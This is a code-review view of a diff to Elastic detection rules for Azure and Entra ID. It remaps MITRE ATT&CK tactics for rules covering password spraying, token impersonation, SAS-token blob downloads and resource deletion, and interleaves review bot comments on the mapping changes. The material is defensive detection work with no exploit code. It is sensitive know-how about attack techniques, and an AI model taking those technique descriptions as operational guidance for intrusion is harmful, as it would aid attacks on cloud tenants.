- "Data Source: Microsoft Entra ID",
- "Data Source: Microsoft Entra ID Sign-in Logs",
- "Use Case: Identity and Access Audit",
- "Use Case: Threat Detection",
- "Tactic: Discovery",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Azure", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-in Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -103,71 +92,46 @@ event.dataset:("azure.signinlogs" or "o365.audit")
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1110"
+name = "Brute Force"
+reference = "https://attack.mitre.org/techniques/T1110/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1110.003"
+name = "Password Spraying"
+reference = "https://attack.mitre.org/techniques/T1110/003/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1069"
 name = "Permission Groups Discovery"
 reference = "https://attack.mitre.org/techniques/T1069/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1069.003"
 name = "Cloud Groups"
 reference = "https://attack.mitre.org/techniques/T1069/003/"
-
-[[rule.threat.technique]]
-id = "T1082"
-name = "System Information Discovery"
-reference = "https://attack.mitre.org/techniques/T1082/"
-
 [[rule.threat.technique]]
 id = "T1087"
 name = "Account Discovery"
 reference = "https://attack.mitre.org/techniques/T1087/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1087.004"
 name = "Cloud Account"
 reference = "https://attack.mitre.org/techniques/T1087/004/"
-
-[[rule.threat.technique]]
-id = "T1201"
-name = "Password Policy Discovery"
-reference = "https://attack.mitre.org/techniques/T1201/"
-
-[[rule.threat.technique]]
-id = "T1526"
-name = "Cloud Service Discovery"
-reference = "https://attack.mitre.org/techniques/T1526/"
-
-[[rule.threat.technique]]
-id = "T1580"
-name = "Cloud Infrastructure Discovery"
-reference = "https://attack.mitre.org/techniques/T1580/"
-
-[[rule.threat.technique]]
-id = "T1673"
-name = "Virtual Machine Discovery"
-reference = "https://attack.mitre.org/techniques/T1673/"
-
-
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1110"
-name = "Brute Force"
-reference = "https://attack.mitre.org/techniques/T1110/"
-[[rule.threat.technique.subtechnique]]
-id = "T1110.003"
-name = "Password Spraying"
-reference = "https://attack.mitre.org/techniques/T1110/003/"
-
-
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-
diff --git a/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml b/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml
index f39b0218f9a..36e63b171e3 100644
--- a/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml
+++ b/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/20"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -64,7 +64,7 @@ references = ["https://docs.microsoft.com/en-us/azure/storage/blobs/anonymous-re
 risk_score = 21
 rule_id = "2636aa6c-88b5-4337-9c31-8d0192a8ef45"
 severity = "low"
-tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Asset Visibility", "Tactic: Discovery", "Resources: Investigation Guide"]
+tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: Azure", "Use Case: Asset Visibility", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -75,38 +75,13 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1619"
-name = "Cloud Storage Object Discovery"
-reference = "https://attack.mitre.org/techniques/T1619/"
-
-[rule.threat.tactic]
-id = "TA0007"
-name = "Discovery"
-reference = "https://attack.mitre.org/tactics/TA0007/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1222"
 name = "File and Directory Permissions Modification"
 reference = "https://attack.mitre.org/techniques/T1222/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1537"
-name = "Transfer Data to Cloud Account"
-reference = "https://attack.mitre.org/techniques/T1537/"
-
-
-[rule.threat.tactic]
-id = "TA0010"
-name = "Exfiltration"
-reference = "https://attack.mitre.org/tactics/TA0010/"
-
diff --git a/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml b/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml
index ca5229f3624..0a1058aa6b4 100644
--- a/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml
+++ b/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/10/02"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/10/02"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -71,16 +71,7 @@ To ensure this rule functions correctly, the following diagnostic logs must be e - StorageRead: This log captures all read operations performed on blobs in the storage account, including GetBlob operations. These logs should be streamed to the Event Hub used for the Azure integration configuration. """ severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: Storage", - "Data Source: Azure", - "Data Source: Azure Platform Logs", - "Data Source: Azure Storage", - "Use Case: Threat Detection", - "Tactic: Exfiltration", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: Storage", "Tactic: Collection", "Data Source: Azure", "Data Source: Azure Platform Logs", "Data Source: Azure Storage", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -95,22 +86,16 @@ event.dataset: azure.platformlogs and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" -[[rule.threat.technique.subtechnique]] -id = "T1567.002" -name = "Exfiltration to Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1567/002/" - +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.new_terms] field = "new_terms_fields" value = ["azure.platformlogs.properties.accountName"] diff --git a/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletion.toml b/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletion.toml index be0e1e3a0ca..c9a25709e1b 100644 --- a/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletion.toml 
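Review bot: The Exfiltration mapping (T1567.002) is dropped entirely in favour of Collection / T1530, so a rule that fires on blob downloads via AzCopy with a SAS token no longer carries the tactic describing data leaving the storage account, which the `"Domain: Storage"` tagging and the rule's setup text about `StorageRead` logs suggest is its purpose. Because the tactics differ, a second `[[rule.threat]]` entry for Exfiltration alongside the new Collection entry would not conflict with a one-entry-per-tactic convention, if dual coverage is intended; otherwise a sentence in the commit description explaining why T1530 alone is preferred would help. Separately, the `tags` array is collapsed from one entry per line onto a single long line here and in the rules on L236, L238, L241, L244, L246 and L249; if the repository's rule formatter does not normalize this, the multi-line form yields far more readable diffs for future tag changes.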
+++ b/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletion.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/10/10"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/10/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -106,22 +106,16 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1485"
-name = "Data Destruction"
-reference = "https://attack.mitre.org/techniques/T1485/"
 [[rule.threat.technique]]
 id = "T1490"
 name = "Inhibit System Recovery"
 reference = "https://attack.mitre.org/techniques/T1490/"
-
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["azure.activitylogs.identity.claims_initiated_by_user.name", "azure.resource.group"]
diff --git a/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletions.toml b/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletions.toml
index 6592f3dc246..59ba9cdf06c 100644
--- a/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletions.toml
+++ b/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletions.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/10/10"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/10/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -110,22 +110,16 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1485"
-name = "Data Destruction"
-reference = "https://attack.mitre.org/techniques/T1485/"
 [[rule.threat.technique]]
 id = "T1490"
 name = "Inhibit System Recovery"
 reference = "https://attack.mitre.org/techniques/T1490/"
-
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
-
 [rule.threshold]
 field = ["azure.activitylogs.identity.claims_initiated_by_user.name"]
 value = 1
diff --git a/rules/integrations/azure/impact_azure_storage_account_deletion.toml b/rules/integrations/azure/impact_azure_storage_account_deletion.toml
index 880e9a87e2f..aff443ad71c 100644
--- a/rules/integrations/azure/impact_azure_storage_account_deletion.toml
+++ b/rules/integrations/azure/impact_azure_storage_account_deletion.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/10/08"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/10/08"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -86,22 +86,16 @@ event.dataset: azure.activitylogs and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1485"
 name = "Data Destruction"
 reference = "https://attack.mitre.org/techniques/T1485/"
-[[rule.threat.technique]]
-id = "T1489"
-name = "Service Stop"
-reference = "https://attack.mitre.org/techniques/T1489/"
-
-
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["azure.activitylogs.identity.claims_initiated_by_user.name"]
diff --git a/rules/integrations/azure/impact_azure_storage_account_deletion_multiple.toml b/rules/integrations/azure/impact_azure_storage_account_deletion_multiple.toml
index b3ce7ddb0c8..b35f1bf641c 100644
--- a/rules/integrations/azure/impact_azure_storage_account_deletion_multiple.toml
+++ b/rules/integrations/azure/impact_azure_storage_account_deletion_multiple.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/10/08"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/10/08"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -90,22 +90,16 @@ event.dataset: azure.activitylogs and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1485"
 name = "Data Destruction"
 reference = "https://attack.mitre.org/techniques/T1485/"
-[[rule.threat.technique]]
-id = "T1489"
-name = "Service Stop"
-reference = "https://attack.mitre.org/techniques/T1489/"
-
-
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
-
 [rule.threshold]
 field = ["azure.activitylogs.identity.claims_initiated_by_user.name"]
 value = 1
diff --git a/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml b/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml
index 8388ea6ebe5..860bd202ab1 100644
--- a/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml
+++ b/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/31"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -78,14 +78,6 @@ event.dataset: "azure.activitylogs"
 '''
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["azure.activitylogs.identity.claims_initiated_by_user.name"]
diff --git a/rules/integrations/azure/impact_kubernetes_pod_deleted.toml b/rules/integrations/azure/impact_kubernetes_pod_deleted.toml
index e1be4f4ec17..31098219fe4 100644
--- a/rules/integrations/azure/impact_kubernetes_pod_deleted.toml
+++ b/rules/integrations/azure/impact_kubernetes_pod_deleted.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/06/24"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Austin Songer"]
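Review bot: `impact_key_vault_modified_by_unusual_user.toml` is left with no `[[rule.threat]]` entry at all after the `@@ -78,14 +78,6 @@` hunk, and this file's `tags` line is not touched anywhere in the diff, so if it still carries `"Tactic: Impact"` that tag now has no backing mapping and any tag/threat consistency check will report it. If the removal is deliberate because no ATT&CK technique fits a key-vault configuration change, that rationale belongs in the commit description; otherwise a tactic-level entry (the removed one had no technique either) keeps the rule's coverage visible in ATT&CK-based reporting. A rule with an empty mapping also disappears from any coverage matrix built from `rule.threat`, which is easy to miss in a sixteen-patch series.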
@@ -78,19 +78,13 @@ event.outcome:(Success or success)
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1489"
 name = "Service Stop"
 reference = "https://attack.mitre.org/techniques/T1489/"
-[[rule.threat.technique]]
-id = "T1529"
-name = "System Shutdown/Reboot"
-reference = "https://attack.mitre.org/techniques/T1529/"
-
-
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
-
diff --git a/rules/integrations/azure/impact_resources_resource_group_deletion.toml b/rules/integrations/azure/impact_resources_resource_group_deletion.toml
index a28f3b45431..86099be4468 100644
--- a/rules/integrations/azure/impact_resources_resource_group_deletion.toml
+++ b/rules/integrations/azure/impact_resources_resource_group_deletion.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/17"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -80,31 +80,13 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1485"
 name = "Data Destruction"
 reference = "https://attack.mitre.org/techniques/T1485/"
-
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1562"
-name = "Impair Defenses"
-reference = "https://attack.mitre.org/techniques/T1562/"
-[[rule.threat.technique.subtechnique]]
-id = "T1562.001"
-name = "Disable or Modify Tools"
-reference = "https://attack.mitre.org/techniques/T1562/001/"
-
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml b/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml
index e394d39c999..48d7a122d65 100644
--- a/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml
+++ b/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/03/10"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -89,39 +89,39 @@ event.dataset: "azure.activitylogs"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-[[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
-
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1552"
 name = "Unsecured Credentials"
 reference = "https://attack.mitre.org/techniques/T1552/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1552.007"
 name = "Container API"
 reference = "https://attack.mitre.org/techniques/T1552/007/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml b/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml
index 1ef19b65dbd..507a7129a7e 100644
--- a/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml
+++ b/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml
@@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["azure"] maturity = "production" -updated_date = "2025/12/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,18 +65,7 @@ references = [ risk_score = 47 rule_id = "8e7a4f2c-9b3d-4e5a-a1b6-c2d8f7e9b3a5" severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra Audit Logs", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Data Source: Azure", "Data Source: Entra ID", "Data Source: Entra Audit Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" 
@@ -106,31 +95,18 @@ from logs-azure.auditlogs-* metadata _id, _version, _index
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-[[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
-
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1548"
-name = "Abuse Elevation Control Mechanism"
-reference = "https://attack.mitre.org/techniques/T1548/"
+id = "T1550"
+name = "Use Alternate Authentication Material"
+reference = "https://attack.mitre.org/techniques/T1550/"
+[[rule.threat.technique.subtechnique]]
+id = "T1550.001"
+name = "Application Access Token"
+reference = "https://attack.mitre.org/techniques/T1550/001/"
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml b/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml
index 9ea2a42f57b..9568883df81 100644
--- a/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml
+++ b/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/24"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
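Review bot: The Privilege Escalation entry (T1548) is dropped from `initial_access_entra_id_actor_token_user_impersonation_abuse.toml` without a replacement, so the rule is narrowed to a single Defense Evasion / T1550.001 entry and loses the tactic that described the outcome of actor-token impersonation — acting with the impersonated user's privileges. T1550.001 is a reasonable fit for the token-use observable in the audit log, but if the escalation aspect is still considered part of what the rule detects, keeping a second `[[rule.threat]]` entry for Privilege Escalation alongside it would preserve that coverage without duplicating a tactic. The `"Tactic: Defense Evasion"` tag on L236 matches the new mapping either way.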
@@ -25,14 +25,7 @@ setup = """ This rule optionally requires Azure Sign-In logs from the Azure integration. Ensure that the Azure integration is correctly set up and that the required data is being collected. """ severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Use Case: Identity and Access Audit", - "Tactic: Initial Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -83,19 +76,30 @@ Entra ID Device Code Authentication allows users to authenticate devices using a [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" 
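Review bot: The Phishing / T1566.002 entry is removed from `initial_access_entra_id_device_code_auth_with_broker_client.toml`, so after this hunk the rule maps to T1550.001 (Defense Evasion) and T1078.004 (Initial Access) only; the hunk on L239 then deletes the old trailing T1550 block, so the net change for this file is the phishing drop plus a reorder, which the commit message does not call out. Device-code sign-ins through a broker client are typically preceded by a lure that delivers the code to the victim, so if the removal is deliberate because the sign-in log shows the token redemption rather than the delivery, say so in the description; otherwise keep the `T1566.002` technique under the Initial Access entry next to `T1078`. The added `"Tactic: Defense Evasion"` tag is consistent with the new first entry.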
@@ -105,20 +109,3 @@ reference = "https://attack.mitre.org/techniques/T1078/004/"
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1550"
-name = "Use Alternate Authentication Material"
-reference = "https://attack.mitre.org/techniques/T1550/"
-[[rule.threat.technique.subtechnique]]
-id = "T1550.001"
-name = "Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1550/001/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml b/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml
index 09ce8630b50..eb88bf1eec5 100644
--- a/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml
+++ b/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/31"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -67,7 +67,7 @@ references = ["https://docs.microsoft.com/en-us/azure/governance/policy/samples/
 risk_score = 21
 rule_id = "141e9b3a-ff37-4756-989d-05d7cbf35b0e"
 severity = "low"
-tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Identity and Access Audit", "Tactic: Initial Access", "Resources: Investigation Guide"]
+tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -78,26 +78,18 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Invite externa
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
+id = "T1136"
+name = "Create Account"
+reference = "https://attack.mitre.org/techniques/T1136/"
+[[rule.threat.technique.subtechnique]]
+id = "T1136.003"
+name = "Cloud Account"
+reference = "https://attack.mitre.org/techniques/T1136/003/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
diff --git a/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml b/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml
index 61dc6a1a52f..9db32da37e9 100644
--- a/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml
+++ b/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/09"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -79,18 +79,7 @@ setup = """#### Required Microsoft Entra ID Sign-In Logs To use this rule, ensure that Microsoft Entra ID Sign-In Logs are being collected and streamed into the Elastic Stack via the Azure integration. """ severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Sign-In Logs", - "Use Case: Identity and Access Audit", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-In Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" 
@@ -108,40 +97,34 @@ event.dataset: "azure.signinlogs"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1550"
+name = "Use Alternate Authentication Material"
+reference = "https://attack.mitre.org/techniques/T1550/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1078.004"
 name = "Cloud Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/004/"
-
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1550"
-name = "Use Alternate Authentication Material"
-reference = "https://attack.mitre.org/techniques/T1550/"
-[[rule.threat.technique.subtechnique]]
-id = "T1550.001"
-name = "Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1550/001/"
-
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [rule.investigation_fields]
 field_names = [
 "azure.signinlogs.properties.service_principal_name",
diff --git a/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml b/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml
index 6ff9e5edd71..de672c91aaf 100644
--- a/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml
+++ b/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/10/14"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/02/26"
+updated_date = "2026/03/23"
 [rule]
